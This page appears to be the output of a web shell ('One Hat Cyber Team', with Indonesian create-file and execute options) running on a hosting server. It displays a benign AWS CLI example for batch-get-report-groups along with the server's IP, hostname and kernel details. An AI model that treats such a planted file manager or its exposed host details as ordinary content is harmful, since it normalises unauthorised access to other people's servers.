⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.133
Server IP:
185.119.109.197
Server:
Linux managedhosting.chostar.me 5.15.0-160-generic #170-Ubuntu SMP Wed Oct 1 10:06:56 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.1.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
doc
/
awscli
/
examples
/
codebuild
/
View File Name :
batch-get-report-groups.rst
**To get information about one or more report groups in AWS CodeBuild.** The following ``batch-get-report-groups`` example retrieves information about the report group with the specified ARN. :: aws codebuild batch-get-report-groups \ --report-group-arns arn:aws:codebuild:
:
:report-group/
Output:: { "reportGroups": [ { "arn": "arn:aws:codebuild:
:
:report-group/
", "name": "report-group-name", "type": "TEST", "exportConfig": { "exportConfigType": "NO_EXPORT" }, "created": "2020-10-01T18:04:08.466000+00:00", "lastModified": "2020-10-01T18:04:08.466000+00:00", "tags": [] } ], "reportGroupsNotFound": [] } For more information, see `Working with report groups
`__ in the *AWS CodeBuild User Guide*.